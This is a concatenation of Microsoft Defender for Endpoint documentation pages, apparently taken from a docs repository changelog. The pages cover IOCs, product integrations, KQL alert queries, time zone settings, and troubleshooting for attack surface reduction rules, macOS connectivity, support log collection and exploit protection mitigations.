-In the context of Microsoft Defender XDR and Microsoft Defender for Endpoint, alert definitions are containers for IOCs and defines the alert, including the metadata that is raised for a specific IOC match. Various metadata is provided as part of the alert definitions. Metadata such as alert definition name of attack, severity, and description is provided along with other options.
-
-Each IOC defines the concrete detection logic based on its type, value, and action, which determines how it's matched. It's bound to a specific alert definition that defines how a detection is displayed as an alert on the Microsoft Defender XDR console.
-
-Here's an example of an IOC:
-- Type: Sha1-- Value: 92cfceb39d57d914ed8b14d0e37643de0797ae56-- Action: Equals-
-IOCs have a many-to-one relationship with alert definitions such that an alert definition can have many IOCs that correspond to it.
-
-## Related topics
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Manage indicators](manage-indicators.md)
security Threat Protection Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-protection-integration.md
- Title: Integrate Microsoft Defender for Endpoint with other Microsoft solutions
-description: Learn how Microsoft Defender for Endpoint integrates with other Microsoft solutions, including Microsoft Defender for Identity and Microsoft Defender for Cloud.
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint and other Microsoft solutions
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Integrate with other Microsoft solutions
-
-Microsoft Defender for Endpoint directly integrates with various Microsoft solutions.
-
-### Microsoft Defender for Cloud
-
-Microsoft Defender for Cloud provides a comprehensive server protection solution, including endpoint detection and response (EDR) capabilities on Windows Servers.
-
-### Microsoft Sentinel
-
-The Microsoft Defender for Endpoint connector lets you stream alerts from Microsoft Defender for Endpoint into Microsoft Sentinel. This will enable you to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response.
-
-### Azure Information Protection
-
-We recently deprecated the Azure Information Protection integration as our Endpoint DLP capabilities incorporate an improved discovery and protection solution for sensitive data stored on endpoint devices that facilitates greater visibility and integration between solutions. This was announced in the following [blog](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/protecting-sensitive-information-on-devices/ba-p/2143555). We recommend that customers move to using Endpoint DLP.
-
-### Conditional Access
-
-Microsoft Defender for Endpoint's dynamic device risk score is integrated into the Conditional Access evaluation, ensuring that only secure devices have access to resources.
-
-### Microsoft Defender for Cloud Apps
-
-Microsoft Defender for Cloud Apps leverages Microsoft Defender for Endpoint signals to allow direct visibility into cloud application usage including the use of unsupported cloud services (shadow IT) from all Microsoft Defender for Endpoint monitored devices.
-
-### Microsoft Defender for Identity
-
-Suspicious activities are processes running under a user context. The integration between Microsoft Defender for Endpoint and Microsoft Defender for Identity provides the flexibility of conducting cyber security investigation across activities and identities.
-
-### Microsoft Defender for Office
-
-[Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) helps protect your organization from malware in email messages or files through Safe Links, Safe Attachments, advanced Anti-Phishing, and spoof intelligence capabilities. The integration between Microsoft Defender for Office 365 and Microsoft Defender for Endpoint enables security analysts to go upstream to investigate the entry point of an attack. Through threat intelligence sharing, attacks can be contained and blocked.
-
-> [!NOTE]
-> Defender for Office 365 data is displayed for events within the last 30 days. For alerts, Defender for Office 365 data is displayed based on first activity time. After that, the data is no longer available in Defender for Office 365.
-
-### Skype for Business
-
-The Skype for Business integration provides a way for analysts to communicate with a potentially compromised user or device owner through a simple button from the portal.
-
-<a name='microsoft-365-defender'></a>
-
-## Microsoft Defender XDR
-
-With Microsoft Defender XDR, Microsoft Defender for Endpoint, and various Microsoft security solutions form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.
-
-[Learn more about Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender)
-
-## Related topics
--- [Configure integration and other advanced features](advanced-features.md)-- [Microsoft Defender XDR overview](/microsoft-365/security/defender/microsoft-365-defender)-- [Turn on Microsoft Defender XDR](/microsoft-365/security/defender/m365d-enable)-- [Protect users, data, and devices with Conditional Access](conditional-access.md)
security Threat Protection Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-protection-reports.md
- Title: Threat protection report in Microsoft Defender for Endpoint
-description: Track alert detections, categories, and severity using the threat protection report.
------- m365-security-- tier2- Previously updated : 1/31/2024--
-# Threat protection report in Microsoft Defender for Endpoint
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!IMPORTANT]
-> The Microsoft Defender for Endpoint Threat Protection report page is now deprecated and is no longer available. Microsoft recommends that you transition to either the Defender XDR alerts or advanced hunting to understand endpoint threat protection details. See the following sections for more information.
-
-## Use the alert queue filter in Defender XDR
-Due to the deprecation of the Defender for Endpoint Threat protection report, you can use the Defender XDR alerts view, filtered against Defender for Endpoint, to see the current status of alerts for protected devices. For alert status, such as *unresolved*, you can filter against *New* and *In progress* items. [Learn more about Defender XDR Alerts](../defender/investigate-alerts.md).
-
-## Use Advanced hunting queries
-Due to the deprecation of the Defender for Endpoint Threat protection report, you can use Advanced hunting queries to find Defender for Endpoint threat protection information. Currently there's no alert status in Advanced hunting elements that maps to resolve/unresolve. [Learn more about Advanced hunting in Defender XDR](../defender/advanced-hunting-overview.md). See the following section for a sample advanced hunting query that shows endpoint related threat protection details.
-
-### Alert status
-
-```kusto
-// Severity
-AlertInfo
-| where Timestamp > startofday(now()) // Today
-| summarize count() by Severity
-| render columnchart
-
-// Detection source
-AlertInfo
-| where Timestamp > startofday(now()) // Today
-| summarize count() by Severity
-| render columnchart
-
-// Detection category
-AlertInfo
-| where Timestamp > startofday(now()) // Today
-| summarize count() by Category
-| render columnchart
-```
--
-### Alert trend
-
-```kusto
-// Severity
-AlertInfo
-| where Timestamp > ago(30d)
-| summarize count() by DetectionSource , bin(Timestamp, 1d)
-| render timechart
-
-// Detection source
-AlertInfo
-| where Timestamp > ago(30d)
-| summarize count() by DetectionSource , bin(Timestamp, 1d)
-| render timechart
-
-// Detection category
-AlertInfo
-| where Timestamp > ago(30d)
-| summarize count() by Category , bin(Timestamp, 1d)
-| render timechart
-```
-
-## Related articles
--- [Device health and compliance report](device-health-reports.md)
security Time Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/time-settings.md
- Title: Microsoft Defender XDR time zone settings
-description: Use the info contained here to configure the Microsoft Defender XDR time zone settings and view license information.
------- m365-security-- tier2-- Previously updated : 12/18/2020--
-# Microsoft Defender XDR time zone settings
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-settings-abovefoldlink)
-
-Use the **Time zone** menu to configure the time zone and view license information.
-
-## Time zone settings
-
-The aspect of time is important in the assessment and analysis of perceived and actual cyberattacks.
-
-Cyberforensic investigations often rely on time stamps to piece together the sequence of events. It's important that your system reflects the correct time zone settings.
-
-Microsoft Defender for Endpoint can display either Coordinated Universal Time (UTC) or local time.
-
-Your current time zone setting is shown in the Microsoft Defender for Endpoint menu. You can change the displayed time zone in the **Time zone** menu.
--
-### UTC time zone
-
-Microsoft Defender for Endpoint uses UTC time by default.
-
-Setting the Microsoft Defender for Endpoint time zone to UTC will display all system timestamps (alerts, events, and others) in UTC for all users. This can help security analysts working in different locations across the globe to use the same time stamps while investigating events.
-
-### Local time zone
-
-You can choose to have Microsoft Defender for Endpoint use local time zone settings. All alerts and events will be displayed using your local time zone.
-
-The local time zone is taken from your device's regional settings. If you change your regional settings, the Microsoft Defender for Endpoint time zone will also change. Choosing this setting means that the timestamps displayed in Microsoft Defender for Endpoint will be aligned to local time for all Microsoft Defender for Endpoint users. Analysts located in different global locations will now see the Microsoft Defender for Endpoint alerts according to their regional settings.
-
-Choosing to use local time can be useful if the analysts are located in a single location. In this case it might be easier to correlate events to local time, for example, when a local user clicked on a suspicious email link.
-
-### Set the time zone
-
-The Microsoft Defender for Endpoint time zone is set by default to UTC. Setting the time zone also changes the times for all Microsoft Defender for Endpoint views.
-
-To set the time zone:
-
-1. Click the **Time zone** menu.
- :::image type="content" source="media/atp-time-zone.png" alt-text="The Time zone settings-3" lightbox="media/atp-time-zone.png":::
-1. Select the **Timezone UTC** indicator.
-1. Select **Timezone UTC** or your local time zone, for example -7:00.
-
-### Regional settings
-
-To apply different date formats for Microsoft Defender for Endpoint, use regional settings for Internet Explorer (IE) and Microsoft Edge (Edge). If you're using another browser such as Google Chrome, follow the required steps to change the time and date settings for that browser.
-
-#### Internet Explorer (IE) and Microsoft Edge
-
-IE and Microsoft Edge use the **Region** settings configured in the **Clocks, Language, and Region** option in the Control panel.
-
-#### Known issues with regional formats
-
-##### Date and time formats
-
-There are some known issues with the time and date formats. If you configure your regional settings to anything other than the supported formats, the portal may not correctly reflect your settings.
-
-The following date and time formats are supported:
--- Date format MM/dd/yyyy-- Date format dd/MM/yyyy-- Time format hh:mm:ss (12 hour format)-
-The following date and time formats are currently not supported:
--- Date format yyyy-MM-dd-- Date format dd-MMM-yy-- Date format dd/MM/yy-- Date format MM/dd/yy-- Date format with yy. Will only show yyyy.-- Time format HH:mm:ss (24 hour format)-
-##### Decimal symbol used in numbers
-
-Decimal symbol used is always a dot, even if a comma is selected in the **Numbers** format settings in **Region** settings. For example, 15,5K is displayed as 15.5K.
security Troubleshoot Asr Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-asr-rules.md
- Title: Report and troubleshoot Microsoft Defender for Endpoint attack surface reduction rules
-description: This article describes how to report and troubleshoot Microsoft Defender for Endpoint attack surface reduction rules
-------- mde-asr-- admindeeplinkDEFENDER----- m365-security-- tier3 Previously updated : 07/18/2023--
-# Report and troubleshoot Defender for Endpoint attack surface reduction rules
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-The <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> is the new interface for monitoring and managing security across your Microsoft identities, data, devices, apps, and infrastructure. Here you can easily view the security health of your organization, act to configure devices, users, and apps, and get alerts for suspicious activity. The Microsoft Defender portal is intended for security admins and security operations teams to better manage and protect their organization. Visit the Microsoft Defender portal at<a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank"><https://security.microsoft.com></a>.
-
-In <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, we offer you a complete look at the current attack surface reduction rules configuration and events in your estate. Your devices must be onboarded into the Microsoft Defender for Endpoint service for these reports to be populated.
-Here's a screenshot from the Microsoft Defender portal (under **Reports** \> **Devices** \> **Attack surface reduction**). At the device level, select **Configuration** from the **Attack surface reduction rules** pane. The following screen is displayed, where you can select a specific device and check its individual attack surface reduction rule configuration.
--
-## Microsoft Defender for Endpoint - Advanced hunting
-
-One of the most powerful features of Microsoft Defender for Endpoint is advanced hunting. If you're unfamiliar with advanced hunting, refer [proactively hunt for threats with advanced hunting](advanced-hunting-overview.md).
-
-Advanced hunting is a query-based (Kusto Query Language) threat-hunting tool that lets you explore up to 30 days of the captured (raw) data, that Defender for Endpoint collects from your devices. Through advanced hunting, you can proactively inspect events to locate interesting indicators and entities. The flexible access to data helps unconstrained hunting for both known and potential threats.
-
-Through advanced hunting, it's possible to extract attack surface reduction rules information, create reports, and get in-depth information on the context of a given attack surface reduction rule audit or block event.
-
-Attack surface reduction rules events are available to be queried from the DeviceEvents table in the advanced hunting section of the Microsoft Defender XDR. For example, a simple query such as the one below can report all the events that have attack surface reduction rules as data source, for the last 30 days, and will summarize them by the ActionType count, that in this case it is the actual codename of the attack surface reduction rule.
-
-```kusto
-DeviceEvents
-| where Timestamp > ago(30d)
-| where ActionType startswith "Asr"
-| summarize EventCount=count() by ActionType
-```
--
-With advanced hunting you can shape the queries to your liking, so that you can see what is happening, regardless of whether you want to pinpoint something on an individual machine, or you want to extract insights from your entire environment.
-
-## Microsoft Defender for Endpoint machine timeline
-
-An alternative to advanced hunting, but with a narrower scope, is the Microsoft Defender for Endpoint machine timeline. You can view all the collected events of a device, for the past six months, in the Microsoft Defender XDR, by going to the Machines list, select a given machine, and then select on the Timeline tab.
-
-The following screenshot shows the Timeline view of these events on a given endpoint. From this view, you can filter the events list based on any of the Event Groups along the right-side pane. You can also enable or disable Flagged and Verbose events while viewing alerts and scrolling through the historical timeline.
--
-## How to troubleshoot attack surface reduction rules?
-
-The first and most immediate way is to check locally, on a Windows device, which attack surface reduction rules are enabled (and their configuration) is by using the PowerShell cmdlets.
-
-Here are a few other sources of information that Windows offers, to troubleshoot attack surface reduction rules' impact and operation.
-
-### Querying which rules are active
-
-One of the easiest ways to determine if attack surface reduction rules are already enabled is through a PowerShell cmdlet, Get-MpPreference.
-
-Here's an example:
--
-There are multiple attack surface reduction rules active, with different configured actions.
-
-To expand the above information on attack surface reduction rules, you can use the properties **AttackSurfaceReductionRules_Ids** and/or **AttackSurfaceReductionRules_Actions**.
-
-Example:
-
-```powershell
-Get-MPPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids
-```
--
-The above shows all the IDs for attack surface reduction rules that have a setting different from 0 (Not Configured).
-
-The next step is then to list the actual actions (Block or Audit) that each rule is configured with.
-
-```powershell
-Get-MPPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Actions
-```
--
-### Querying blocking and auditing events
-
-attack surface reduction rule events can be viewed within the Windows Defender log.
-
-To access it, open Windows Event Viewer, and browse to **Applications and Services Logs** \> **Microsoft** \> **Windows** \> **Windows Defender** \> **Operational**.
--
-## Microsoft Defender Antimalware Protection Logs
-
-You can also view rule events through the Microsoft Defender Antivirus dedicated command-line tool, called `*mpcmdrun.exe*`, that can be used to manage and configure, and automate tasks if needed.
-
-You can find this utility in *%ProgramFiles%\Windows Defender\MpCmdRun.exe*. You must run it from an elevated command prompt (that is, run as Admin).
-
-To generate the support information, type *MpCmdRun.exe -getfiles*. After a while, several logs will be packaged into an archive (MpSupportFiles.cab) and made available in *C:\ProgramData\Microsoft\Windows Defender\Support*.
--
-Extract that archive and you'll have many files available for troubleshooting purposes.
-
-The most relevant files are as follows:
--- **MPOperationalEvents.txt**: This file contains same level of information found in Event Viewer for Windows Defender's Operational log.-- **MPRegistry.txt**: In this file you can analyze all the current Windows Defender configurations, from the moment the support logs were captured.-- **MPLog.txt**: This log contains more verbose information about all the actions/operations of the Windows Defender.
security Troubleshoot Asr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-asr.md
- Title: Troubleshoot problems with attack surface reduction rules
-description: Resources and sample code to troubleshoot issues with attack surface reduction rules in Microsoft Defender for Endpoint.
--- Previously updated : 07/28/2023-------- m365-security-- tier3-- mde-asr--
-# Troubleshoot attack surface reduction rules
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-When you use [attack surface reduction rules](attack-surface-reduction.md) you might run into issues, such as:
--- A rule blocks a file, process, or performs some other action that it shouldn't (false positive)-- A rule doesn't work as described, or doesn't block a file or process that it should (false negative)-
-There are four steps to troubleshooting these problems:
-
-1. [Confirm prerequisites](#confirm-prerequisites)
-2. [Use audit mode to test the rule](#use-audit-mode-to-test-the-rule)
-3. [Add exclusions for the specified rule](#add-exclusions-for-a-false-positive) (for false positives)
-4. [Submit support logs](#collect-diagnostic-data-for-file-submissions)
-
-## Confirm prerequisites
-
-Attack surface reduction rules only work on devices with the following conditions:
--- Endpoints are running Windows 10 Enterprise or later.--- Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection app. [Using any other antivirus app causes Microsoft Defender Antivirus to disable itself](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-compatibility).--- [Real-time protection](/windows/security/threat-protection/microsoft-defender-antivirus/configure-real-time-protection-microsoft-defender-antivirus) is enabled.--- Audit mode isn't enabled. Use Group Policy to set the rule to **Disabled** (value: **0**) as described in [Enable attack surface reduction rules](enable-attack-surface-reduction.md).-
-If these prerequisites are met, proceed to the next step to test the rule in audit mode.
-
-## Use audit mode to test the rule
-
-Follow these instructions in [Use the demo tool to see how attack surface reduction rules work](evaluate-attack-surface-reduction.md) to test the specific rule you're encountering problems with.
-
-1. Enable audit mode for the specific rule you want to test. Use Group Policy to set the rule to **Audit mode** (value: **2**) as described in [Enable attack surface reduction rules](enable-attack-surface-reduction.md). Audit mode allows the rule to report the file or process, but allows it to run.
-
-2. Perform the activity that is causing an issue (for example, open or execute the file or process that should be blocked but is being allowed).
-
-3. [Review the attack surface reduction rule event logs](attack-surface-reduction.md) to see if the rule would block the file or process if the rule were set to **Enabled**.
-
-If a rule isn't blocking a file or process that you're expecting it should block, first check if audit mode is enabled.
-
-Audit mode might be enabled for testing another feature, or by an automated PowerShell script, and might not be disabled after the tests were completed.
-
-If you've tested the rule with the demo tool and with audit mode, and attack surface reduction rules are working on preconfigured scenarios, but the rule isn't working as expected, proceed to either of the following sections based on your situation:
-
-1. If the attack surface reduction rule is blocking something that it shouldn't block (also known as a false positive), you can [first add an attack surface reduction rule exclusion](#add-exclusions-for-a-false-positive).
-
-2. If the attack surface reduction rule isn't blocking something that it should block (also known as a false negative), you can proceed immediately to the last step, [collecting diagnostic data and submitting the issue to us](#collect-diagnostic-data-for-file-submissions).
-
-## Add exclusions for a false positive
-
-If the attack surface reduction rule is blocking something that it shouldn't block (also known as a false positive), you can add exclusions to prevent attack surface reduction rules from evaluating the excluded files or folders.
-
-To add an exclusion, see [Customize Attack surface reduction](attack-surface-reduction-rules-deployment-implement.md#customize-attack-surface-reduction-rules).
-
-> [!IMPORTANT]
-> You can specify individual files and folders to be excluded, but you cannot specify individual rules.
-> This means any files or folders that are excluded will be excluded from all ASR rules.
-
-## Report a false positive or false negative
-
-Use the [Microsoft Security Intelligence web-based submission form](https://www.microsoft.com/wdsi/support/report-exploit-guard) to report a false negative or false positive for network protection. With a Windows E5 subscription, you can also [provide a link to any associated alert](alerts-queue.md).
-
-## Collect diagnostic data for file submissions
-
-When you report a problem with attack surface reduction rules, you're asked to collect and submit diagnostic data that can be used by Microsoft support and engineering teams to help troubleshoot issues.
-
-1. Open an elevated command prompt and change to the Windows Defender directory:
-
- ```console
- cd "c:\program files\Windows Defender"
- ```
-
-2. Run this command to generate the diagnostic logs:
-
- ```console
- mpcmdrun -getfiles
- ```
-
-3. By default, they're saved to `C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab`. Attach the file to the submission form.
-
-## Related articles
--- [Attack surface reduction rules](attack-surface-reduction.md)-- [Enable attack surface reduction rules](enable-attack-surface-reduction.md)-- [Evaluate attack surface reduction rules](evaluate-attack-surface-reduction.md)
security Troubleshoot Cloud Connect Mdemac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-cloud-connect-mdemac.md
- Title: Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS
-description: This topic describes how to troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/25/2021--
-# Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-**Platform**
-macOS
-
-This topic describes how to Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS.
-
-## Run the connectivity test
-To test if Defender for Endpoint on Mac can communicate to the cloud with the current network settings, run a connectivity test from the command line:
-
-```Bash
-mdatp connectivity test
-```
-
-expected output:
-```Bash
-Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]
-Testing connection with https://eu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
-Testing connection with https://wu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
-Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
-Testing connection with https://winatp-gw-cus.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-weu.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-neu.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-ukw.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-uks.microsoft.com/test ... [OK]
-Testing connection with https://eu-v20.events.data.microsoft.com/ping ... [OK]
-Testing connection with https://us-v20.events.data.microsoft.com/ping ... [OK]
-Testing connection with https://uk-v20.events.data.microsoft.com/ping ... [OK]
-Testing connection with https://v20.events.data.microsoft.com/ping ... [OK]
-```
-
-If the connectivity test fails, check if the device has Internet access and if [any of the endpoints required by the product](microsoft-defender-endpoint-mac.md#network-connections) are blocked by a proxy or firewall.
-
-Failures with curl error 35 or 60 indicate certificate pinning rejection, which indicates a potential issue with SSL or HTTPS inspection. See instructions below regarding SSL inspection configuration.
-
-## Troubleshooting steps for environments without proxy or with Proxy autoconfig (PAC) or with Web Proxy Autodiscovery Protocol (WPAD)
-Use the following procedure to test that a connection is not blocked in an environment without a proxy or with Proxy autoconfig (PAC) or with Web Proxy Autodiscovery Protocol (WPAD).
-
-If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is permitted in the previously listed URLs.
-
-> [!WARNING]
-> Authenticated proxies are not supported. Ensure that only PAC, WPAD, or a static proxy is being used. SSL inspection and intercepting proxies are also not supported for security reasons. Configure an exception for SSL inspection and your proxy server to directly pass through data from Microsoft Defender for Endpoint on macOS to the relevant URLs without interception. Adding your interception certificate to the global store will not allow for interception.
-To test that a connection is not blocked:
-In a browser such as Microsoft Edge for Mac or Safari open https://x.cp.wd.microsoft.com/api/report and https://cdn.x.cp.wd.microsoft.com/ping.
-
-Optionally, in Terminal, run the following command:
-
-```Bash
-curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'
-```
-
-The output from this command should be similar to:
-```bash
-OK https://x.cp.wd.microsoft.com/api/report
-OK https://cdn.x.cp.wd.microsoft.com/ping
-```
security Troubleshoot Collect Support Log https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-collect-support-log.md
- Title: Collect support logs in Microsoft Defender for Endpoint using live response
-description: Learn how to collect logs using live response to troubleshoot Microsoft Defender for Endpoint issues
------- m365-security-- tier3-- mde-edr-- Previously updated : 12/18/2020--
-# Collect support logs in Microsoft Defender for Endpoint using live response
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-When contacting support, you may be asked to provide the output package of the Microsoft Defender for Endpoint Client Analyzer tool.
-
-This topic provides instructions on how to run the tool via Live Response.
-
-1. Download and fetch the required scripts available from within the 'Tools' sub-directory of the [Microsoft Defender for Endpoint Client Analyzer](https://aka.ms/BetaMDEAnalyzer). <br>
-For example, to get the basic sensor and device health logs, fetch "..\Tools\MDELiveAnalyzer.ps1".<br>
-If you also require Defender Antivirus support logs (MpSupportFiles.cab), then fetch "..\Tools\MDELiveAnalyzerAV.ps1"
-
-2. Initiate a [Live Response session](live-response.md#initiate-a-live-response-session-on-a-device) on the machine you need to investigate.
-
-3. Select **Upload file to library**.
-
- :::image type="content" source="media/upload-file.png" alt-text="The upload file" lightbox="media/upload-file.png":::
-
-4. Select **Choose file**.
-
- :::image type="content" source="media/choose-file.png" alt-text="The choose file button-1" lightbox="media/choose-file.png":::
-
-5. Select the downloaded file named MDELiveAnalyzer.ps1 and then click on **Confirm**
-
- :::image type="content" source="media/analyzer-file.png" alt-text="The choose file button-2" lightbox="media/analyzer-file.png":::
-
-6. While still in the LiveResponse session, use the commands below to run the analyzer and collect the result file:
-
- ```console
- Run MDELiveAnalyzer.ps1
- GetFile "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\MDEClientAnalyzerResult.zip"
- ```
-
- [![Image of commands.](media/analyzer-commands.png)](media/analyzer-commands.png#lightbox)
-
-> [!NOTE]
->
-> - The latest preview version of MDEClientAnalyzer can be downloaded here: <https://aka.ms/Betamdeanalyzer>.
-> - The LiveAnalyzer script downloads the troubleshooting package on the destination machine from: `https://mdatpclientanalyzer.blob.core.windows.net`.
->
-> If you cannot allow the machine to reach the above URL, then upload MDEClientAnalyzerPreview.zip file to the library before running the LiveAnalyzer script:
->
-> ```console
-> PutFile MDEClientAnalyzerPreview.zip -overwrite
-> Run MDELiveAnalyzer.ps1
-> GetFile "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\MDEClientAnalyzerResult.zip"
-> ```
->
-> - For more information on gathering data locally on a machine in case the machine isn't communicating with Microsoft Defender for Endpoint cloud services, or does not appear in Microsoft Defender for Endpoint portal as expected, see [Verify client connectivity to Microsoft Defender for Endpoint service URLs](verify-connectivity.md).
->
-> - As described in [Live response command examples](live-response-command-examples.md), you may want to use the '&' symbol at the end of the command to collect logs as a background action:
->
-> ```console
-> Run MDELiveAnalyzer.ps1&
-> ```
-
-## See also
--- [Client analyzer overview](overview-client-analyzer.md)-- [Download and run the client analyzer](download-client-analyzer.md)-- [Run the client analyzer on Windows](run-analyzer-windows.md)-- [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md)-- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)-- [Understand the analyzer HTML report](analyzer-report.md)
security Troubleshoot Exploit Protection Mitigations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-exploit-protection-mitigations.md
- Title: Troubleshoot exploit protection mitigations
-description: Learn how to deal with unwanted mitigations in Windows Security, including a process to remove all mitigations and import a baseline configuration file instead.
---- Previously updated : 08/09/2018------ m365-security-- tier3-- mde-asr--
-# Troubleshoot exploit protection mitigations
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
--
-When you create a set of exploit protection mitigations (known as a configuration), you might find that the configuration export and import process does not remove all unwanted mitigations.
-
-You can manually remove unwanted mitigations in Windows Security, or you can use the following process to remove all mitigations and then import a baseline configuration file instead.
-
-1. Remove all process mitigations with this PowerShell script:
-
- ```PowerShell
- # Check if Admin-Privileges are available
- function Test-IsAdmin {
- ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
- }
-
- # Delete ExploitGuard ProcessMitigations for a given key in the registry. If no other settings exist under the specified key,
- # the key is deleted as well
- function Remove-ProcessMitigations([Object] $Key, [string] $Name) {
- Try {
- if ($Key.GetValue("MitigationOptions")) {
- Write-Host "Removing MitigationOptions for: " $Name
- Remove-ItemProperty -Path $Key.PSPath -Name "MitigationOptions" -ErrorAction Stop;
- }
- if ($Key.GetValue("MitigationAuditOptions")) {
- Write-Host "Removing MitigationAuditOptions for: " $Name
- Remove-ItemProperty -Path $Key.PSPath -Name "MitigationAuditOptions" -ErrorAction Stop;
- }
- if ($Key.GetValue("EAFModules")) {
- Write-Host "Removing EAFModules for: " $Name
